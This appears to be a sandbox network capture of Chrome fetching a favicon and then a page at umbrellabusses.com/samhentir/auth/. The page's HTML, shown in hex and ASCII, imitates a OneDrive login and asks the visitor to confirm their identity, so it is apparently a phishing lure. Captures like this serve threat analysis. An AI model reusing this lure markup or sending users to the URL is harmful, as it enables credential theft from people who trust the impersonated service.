                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC1369INData Raw: ff cf 76 a2 ff cc 74 9f ff ca 72 9d ff c7 6f 99 ff c4 6d 97 ff c2 6c 94 ff bf 6a 91 ff be 68 90 fa bc 66 8d d4 bb 65 8a 62 aa 55 55 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 6d 24 07 c7 70 30 3b c7 72 47 bc bb 69 34 fe ab 5e 1b ff a3 5a 19 ff aa 5f 32 ff c5 73 6a ff e9 8d af ff f8 98 cb ff fa 99 d0 ff f7 97 cd ff f5 95 ca ff f1 92 c6 ff ee 8f c3 ff ea 8c bf ff e7 89 bb ff e3 86 b7 ff df 84 b3 ff dc 81 af ff d8 7e ac ff d5 7b a8 ff d2 78 a5 ff ce 75 a1 ff cb 73 9e ff c8 70 9b ff c5 6e 98 ff c2 6c 95 ff c0 6a 93 ff be 68 90 ff bc 67 8d ff ba 65 8b ff b8 63 8a fe b7 62 87 bb b2 5d 84 3c b6 6d 92 07 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: vtromljhfebUUm$p0;rGi4^Z_2sj~{xuspnljhgecb]<m
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC1369INData Raw: b0 5d 81 ff ad 5b 7f ff ac 5a 7c ff aa 58 7b ff a9 58 79 ff a8 57 78 ff a7 56 78 ff a5 56 76 ff a4 55 75 ff a4 53 75 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 da 79 48 7c da 7b 48 ff da 7b 48 ff da 7b 46 ff d9 7a 45 ff d9 7a 44 ff d9 7a 41 ff d8 79 3d ff d6 79 38 ff d4 77 32 ff d1 75 2e ff ce 74 29 ff cb 72 25 ff c7 70 20 ff c3 6d 1d ff be 6a 18 ff b8 66 14 ff b2 62 10 f4 a9 5d 0c a4 a1 56 0b 44 aa 55 00 06 d4 80 aa 06 d6 7c a9 44 d2 79 a4 a5 cc 73 9e f3 c5 6e 97 ff c0 6b 92 ff bc 67 8d ff b8 63 89 ff b4 60 85 ff b1 5f 82 ff af 5c 80 ff ac 5a 7d ff aa 59 7b ff a9 58 79 ff a8 57 78 ff a7 56 77 ff a6 55 76 ff a4 54 75 ff a2 53 73 ff a0 52 71 ff a2 57 6e 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: ][Z|X{XyWxVxVvUuSubyH|{H{H{FzEzDzAy=y8w2u.t)r%p mjfb]VDU|Dysnkgc`_\Z}Y{XyWxVwUvTuSsRqWn{
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC1369INData Raw: 8c 4f ff f6 da 4f ff fe e3 4f ff ff e3 50 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d9 7b 65 81 dc 7c 65 ff dc 7c 65 ff dc 7c 66 ff dc 7c 67 ff dd 7c 68 ff dc 7c 69 ff dd 7c 6b ff dd 7c 6c ff dd 7c 6e ff dd 7c 70 ff dd 7d 73 ff de 7d 76 fc e0 7d 79 7c 80 80 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 80 80 02 95 49 66 7d 94 49 65 fc 91 47 63 ff 8e 45 61 ff 8b 43 5d ff 87 40 5a ff 83 3d 56 ff 7e 3b 52 ff 9c 65 4e ff df bd 4f ff fb e0 50 ff ff e5 50 ff ff e5 50 ff ff e5 50 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d9 7b 69 81 dc 7c 69 ff dc 7c 69 ff dc 7c 6b ff dd 7c 6c ff dd 7c 6d ff
                                                                                                                                                                                                                        Data Ascii: OOOP{e|e|e|f|g|h|i|k|l|n|p}s}v}y|If}IeGcEaC]@Z=V~;ReNOPPPP{i|i|i|k|l|m
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 7b 7d 81 de 7d 7e ff de 7d 80 ff de 7d 82 ff df 7d 84 ff df 7d 86 ff df 7d 89 ff df 7d 8b ff df 7d 8e ff df 7e 92 ff e0 7e 96 ff e0 7e 9a ff df 7d 9c ff b1 5f 64 ff 93 4b 33 ff a4 56 36 fd af 5c 3a ca ba 60 3e 4a bf 6a 40 18 c6 71 39 09 aa 55 55 03 ff 80 80 02 e3 8e 55 09 df 9f 4a 18 e7 a7 47 4b e8 ae 49 ca ea b3 4b fd ec b8 4b ff ed bc 4b ff ef bf 4c ff f0 c3 4c ff f1 c5 4c ff f3 c7 4c ff f3 ca 4d ff f4 cc 4d ff f5 cd 4d ff f5 cf 4d ff f5 d0 4d ff f6 d0 4e ff f7 d2 4e ff f7 d2 4e ff f9 d3 4e 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 7b 80 7c de 7d 81 ff de 7d 83 ff df 7d 85 ff df 7d 87 ff df 7d 8a ff df 7d 8c ff df 7d 8f ff df 7d 92 ff e0 7e 95 ff e0 7e 99 ff e0 7e 9d ff e0
                                                                                                                                                                                                                        Data Ascii: {}}~}}}}}}}~~~}_dK3V6\:`>Jj@q9UUUJGKIKKKLLLLMMMMMNNNN{|}}}}}}}}~~~


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        66192.168.2.549905104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC363OUTGET /samhentir/img/ffg.ico HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC948INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:55 GMT
                                                                                                                                                                                                                        Content-Type: image/x-icon
                                                                                                                                                                                                                        Content-Length: 15406
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:25:20 GMT
                                                                                                                                                                                                                        ETag: "675ef4e0-3c2e"
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 1
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BnhNQb5hznzJlZsrAJI%2BcKI0iW0fvY8eaSLHBtOS3FSBPu6J9Ik7VruSR%2BYmjpkQ9h8VG0CLJGp0ufc%2FGglx%2BHdhFSVD5VW3VOW6mU60kbLfHOPkkzeL36n1J7LwyS5U%2BpfsNqA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd267c9d4a6a53-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1651&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=941&delivery_rate=1768625&cwnd=222&unsent_bytes=0&cid=2f2748887a071368&ts=157&x=0"
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC421INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e9 90 bc 17 e3 88 b8 6f dd 81 b1 6f de 7a b1 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 92 db 07 f4 95 c9 76 ed 8e c2 f1 e5 88 b9 ff dd 81 b1 ff d6 7b a8 f1 cd 75 a0 76 b6 6d 92 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 98 cf 4f fd 9b d3 db f7 96 cc ff ef 90 c4 ff e6 88 ba ff dc
                                                                                                                                                                                                                        Data Ascii: h6 (00 h&( oozv{uvmO
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC1369INData Raw: d5 d9 7a 45 ff d7 79 3c ff d1 75 2e ff c7 6f 21 ff b7 66 15 e7 a0 57 10 61 d8 7c a8 61 c6 6e 97 e7 b8 63 89 ff ae 5c 80 ff a9 58 79 ff a5 55 76 ff a2 54 71 d5 00 00 00 00 00 00 00 00 db 7a 53 d9 da 7b 54 ff da 7b 54 ff da 7b 51 ff d7 79 47 ea d1 76 2e 1c 00 00 00 00 00 00 00 00 b6 64 89 1c aa 59 7b eb a4 54 75 ff 9f 50 6f ff 96 4b 68 ff af 74 5c d8 00 00 00 00 00 00 00 00 dc 7b 60 d9 dc 7c 62 ff dc 7c 65 ff dc 7c 69 ff dd 7c 6e 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 4d 6b 8f 95 49 66 ff 8b 43 5d ff a4 6c 53 ff f4 d7 50 d8 00 00 00 00 00 00 00 00 dc 7b 6c d9 dd 7c 70 ff dd 7c 75 ff de 7d 7d ff e0 7d 86 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 43 5e 7a 92 53 54 ff d3 aa 4f ff fc e0 4f ff fe e1 4f d8 00 00 00 00 00 00 00 00 dd 7d
                                                                                                                                                                                                                        Data Ascii: zEy<u.o!fWa|anc\XyUvTqzS{T{T{QyGv.dY{TuPoKht\{`|b|e|i|nMkIfC]lSP{l|p|u}}}zC^zSTOOO}
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC1369INData Raw: e8 8a bc ff e3 87 b8 ff df 83 b3 ff da 80 ae ff d6 7c a9 ff d1 78 a4 ff cd 75 a0 ff c9 72 9c ff c6 6f 99 f2 c3 6c 95 7b c6 71 8e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 01 f9 98 cb 54 fa 99 cf de fd 9b d3 ff fe 9c d3 ff fa 99 d0 ff f6 96 cb ff f2 92 c7 ff ed 8e c2 ff e9 8a bd ff e3 87 b8 ff de 83 b2 ff da 7f ad ff d5 7b a8 ff d0 77 a3 ff cc 73 9f ff c7 70 9a ff c4 6d 96 ff c0 6b 92 ff be 67 90 de b9 67 8c 54 ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 68 17 2c c1 6d 2c be b4 64 22 ff a6 5b 15 ff a8 5d 2c ff c6 73 6e ff f4 95 c4 ff f8 97 ce ff f4 94 c9 ff ef 90 c4
                                                                                                                                                                                                                        Data Ascii: |xurol{qT{wspmkggTh,m,d"[],sn
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC1369INData Raw: 7c 65 ff dc 7c 67 ff dc 7c 68 ff dc 7c 6a ff dc 7c 6d ff dd 7c 70 ff dd 7d 75 f9 ff 92 6d 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f 40 60 08 96 49 66 f9 92 47 64 ff 8e 45 60 ff 88 41 5b ff 81 3d 55 ff 9c 64 4f ff e7 c7 4f ff fe e4 50 ff ff e5 50 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 7c 69 b3 dc 7c 6a ff dc 7c 6c ff dd 7c 6e ff dd 7c 70 ff dd 7c 73 ff dd 7c 76 ff de 7d 7b ff de 7d 81 f3 ff 80 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 80 02 90 46 62 f3 8a 42 5c ff 82 3e 56 ff 8c 4e 4f ff d1 a9 4e ff fd e1 4f ff fd e3 4f ff fe e3 4f ff ff e4 50 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dd 7c 6f b3 dd 7c 70 ff
                                                                                                                                                                                                                        Data Ascii: |e|g|h|j|m|p}um@`IfGdE`A[=UdOOPP|i|j|l|n|p|s|v}{}FbB\>VNONOOOP|o|p
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC1369INData Raw: 4b be ee bf 4b 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 ff 01 e1 7e a2 55 e0 7e a7 de e1 7f ab ff e2 7f ac ff df 7d a7 ff 91 4a 35 ff a7 59 38 ff bc 69 3d ff cb 77 42 ff d5 84 45 ff da 8c 46 ff dc 92 47 ff de 97 47 ff e0 9c 48 ff e3 a1 48 ff e4 a6 49 ff e6 aa 49 ff e8 ae 4a ff e9 b2 4a de ea b3 49 54 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 8e aa 09 e0 80 ad 7c e1 7e ac f2 e1 7e a9 ff a4 56 4d ff a8 59 38 ff bc 69 3e ff cc 77 42 ff d6 84 45 ff da 8c 46 ff dc 91 47 ff de 96 47 ff e0 9b 47 ff e2 9f 48 ff e3 a4 49 ff e6 a9 49 f2 e8 ac 49 7b ff aa 55 09 00 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: KK,~U~}J5Y8i=wBEFGGHHIIJJIT|~~VMY8i>wBEFGGGHIII{U
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC1369INData Raw: 65 e2 85 b6 7b e0 85 b4 7b de 81 b1 65 db 80 b2 38 df 80 9f 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 01 eb 8e bf 34 ea 8c bf b3 e7 8a bc e7 e4 88 b9 f6 e2 85 b6 fd e0 84 b4 fc dd 82 b1 f6 db 80 ae e7 d9 7d ac b5 d8 7b ac 34 ff ff ff 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: e{{e84}{4
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC1369INData Raw: cf 76 a2 ff cc 74 9f ff ca 72 9d ff c7 6f 99 ff c4 6d 97 ff c2 6c 94 ff bf 6a 91 ff be 68 90 fa bc 66 8d d4 bb 65 8a 62 aa 55 55 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 6d 24 07 c7 70 30 3b c7 72 47 bc bb 69 34 fe ab 5e 1b ff a3 5a 19 ff aa 5f 32 ff c5 73 6a ff e9 8d af ff f8 98 cb ff fa 99 d0 ff f7 97 cd ff f5 95 ca ff f1 92 c6 ff ee 8f c3 ff ea 8c bf ff e7 89 bb ff e3 86 b7 ff df 84 b3 ff dc 81 af ff d8 7e ac ff d5 7b a8 ff d2 78 a5 ff ce 75 a1 ff cb 73 9e ff c8 70 9b ff c5 6e 98 ff c2 6c 95 ff c0 6a 93 ff be 68 90 ff bc 67 8d ff ba 65 8b ff b8 63 8a fe b7 62 87 bb b2 5d 84 3c b6 6d 92 07 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: vtromljhfebUUm$p0;rGi4^Z_2sj~{xuspnljhgecb]<m
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC1369INData Raw: 5d 81 ff ad 5b 7f ff ac 5a 7c ff aa 58 7b ff a9 58 79 ff a8 57 78 ff a7 56 78 ff a5 56 76 ff a4 55 75 ff a4 53 75 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 da 79 48 7c da 7b 48 ff da 7b 48 ff da 7b 46 ff d9 7a 45 ff d9 7a 44 ff d9 7a 41 ff d8 79 3d ff d6 79 38 ff d4 77 32 ff d1 75 2e ff ce 74 29 ff cb 72 25 ff c7 70 20 ff c3 6d 1d ff be 6a 18 ff b8 66 14 ff b2 62 10 f4 a9 5d 0c a4 a1 56 0b 44 aa 55 00 06 d4 80 aa 06 d6 7c a9 44 d2 79 a4 a5 cc 73 9e f3 c5 6e 97 ff c0 6b 92 ff bc 67 8d ff b8 63 89 ff b4 60 85 ff b1 5f 82 ff af 5c 80 ff ac 5a 7d ff aa 59 7b ff a9 58 79 ff a8 57 78 ff a7 56 77 ff a6 55 76 ff a4 54 75 ff a2 53 73 ff a0 52 71 ff a2 57 6e 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: ][Z|X{XyWxVxVvUuSubyH|{H{H{FzEzDzAy=y8w2u.t)r%p mjfb]VDU|Dysnkgc`_\Z}Y{XyWxVwUvTuSsRqWn{
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC1369INData Raw: 4f ff f6 da 4f ff fe e3 4f ff ff e3 50 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d9 7b 65 81 dc 7c 65 ff dc 7c 65 ff dc 7c 66 ff dc 7c 67 ff dd 7c 68 ff dc 7c 69 ff dd 7c 6b ff dd 7c 6c ff dd 7c 6e ff dd 7c 70 ff dd 7d 73 ff de 7d 76 fc e0 7d 79 7c 80 80 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 80 80 02 95 49 66 7d 94 49 65 fc 91 47 63 ff 8e 45 61 ff 8b 43 5d ff 87 40 5a ff 83 3d 56 ff 7e 3b 52 ff 9c 65 4e ff df bd 4f ff fb e0 50 ff ff e5 50 ff ff e5 50 ff ff e5 50 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d9 7b 69 81 dc 7c 69 ff dc 7c 69 ff dc 7c 6b ff dd 7c 6c ff dd 7c 6d ff dd
                                                                                                                                                                                                                        Data Ascii: OOOP{e|e|e|f|g|h|i|k|l|n|p}s}v}y|If}IeGcEaC]@Z=V~;ReNOPPPP{i|i|i|k|l|m
                                                                                                                                                                                                                        2025-01-10 13:52:55 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 db 7b 7d 81 de 7d 7e ff de 7d 80 ff de 7d 82 ff df 7d 84 ff df 7d 86 ff df 7d 89 ff df 7d 8b ff df 7d 8e ff df 7e 92 ff e0 7e 96 ff e0 7e 9a ff df 7d 9c ff b1 5f 64 ff 93 4b 33 ff a4 56 36 fd af 5c 3a ca ba 60 3e 4a bf 6a 40 18 c6 71 39 09 aa 55 55 03 ff 80 80 02 e3 8e 55 09 df 9f 4a 18 e7 a7 47 4b e8 ae 49 ca ea b3 4b fd ec b8 4b ff ed bc 4b ff ef bf 4c ff f0 c3 4c ff f1 c5 4c ff f3 c7 4c ff f3 ca 4d ff f4 cc 4d ff f5 cd 4d ff f5 cf 4d ff f5 d0 4d ff f6 d0 4e ff f7 d2 4e ff f7 d2 4e ff f9 d3 4e 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 7b 80 7c de 7d 81 ff de 7d 83 ff df 7d 85 ff df 7d 87 ff df 7d 8a ff df 7d 8c ff df 7d 8f ff df 7d 92 ff e0 7e 95 ff e0 7e 99 ff e0 7e 9d ff e0 7d
                                                                                                                                                                                                                        Data Ascii: {}}~}}}}}}}~~~}_dK3V6\:`>Jj@q9UUUJGKIKKKLLLLMMMMMNNNN{|}}}}}}}}~~~}


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        67192.168.2.549956104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:03 UTC731OUTGET /samhentir/auth/ HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC863INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:04 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MKXAL08xlV09LW7TBrKjNp6XWQlN%2FRn6UAZFxxhyW3A5MvDWJQcGWg7eAMFTWnjheqg0N%2Fb2O3%2BeCl5fTPtf7PCTnPERLCeiV0rRm3LRzPqiucdGxSov01tY0%2BpDlr%2BGkziM764%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26af4c6c8cda-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1830&rtt_var=915&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4232&recv_bytes=1309&delivery_rate=289941&cwnd=243&unsent_bytes=0&cid=8a9de41665238a7f&ts=321&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC506INData Raw: 65 63 38 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6e 65 20 44 72 69 76 65 20 2d 20 4c 6f 67 69 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2e 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c
                                                                                                                                                                                                                        Data Ascii: ec8<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>One Drive - Login</title> <link rel="stylesheet" href="../css/main.css"> <styl
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC1369INData Raw: 74 61 69 6e 65 72 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 42 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6e 66 69 72 6d 20 59 6f 75 72 20 49 64 65 6e 74 69 74 79 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 42 6f 78 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 43 6f 6e 70 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 59 6f 75 20 68 61 76 65 20 72 65 63 65 69 76 65 64
                                                                                                                                                                                                                        Data Ascii: tainer"> <div class="conBox"> <h1>Confirm Your Identity</h1> </div> <div class="conBox2"> <div class="textConp"> <p>You have received
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 43 6c 69 63 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 42 79 20 43 6c 69 63 6b 69 6e 67 20 4e 65 78 74 2c 20 79 6f 75 20 61 72 65 20 67 72 61 6e 74 69 6e 67 20 4f 6e 65 44 72 69 76 65 20 74 68 65 20 50 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 75 73 65 20 79 6f 75 72 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 20 69 6e 20 6c 69 6e 65 20 77 69 74 68 20 74 68 65 69 72 20 70 72 69 76 61 63 79 20 73 74 61 74 65 6d 65 6e 74 2e 3c 2f
                                                                                                                                                                                                                        Data Ascii: </form> </div> <div class="boxClick"> <p>By Clicking Next, you are granting OneDrive the Permission to use your email address in line with their privacy statement.</
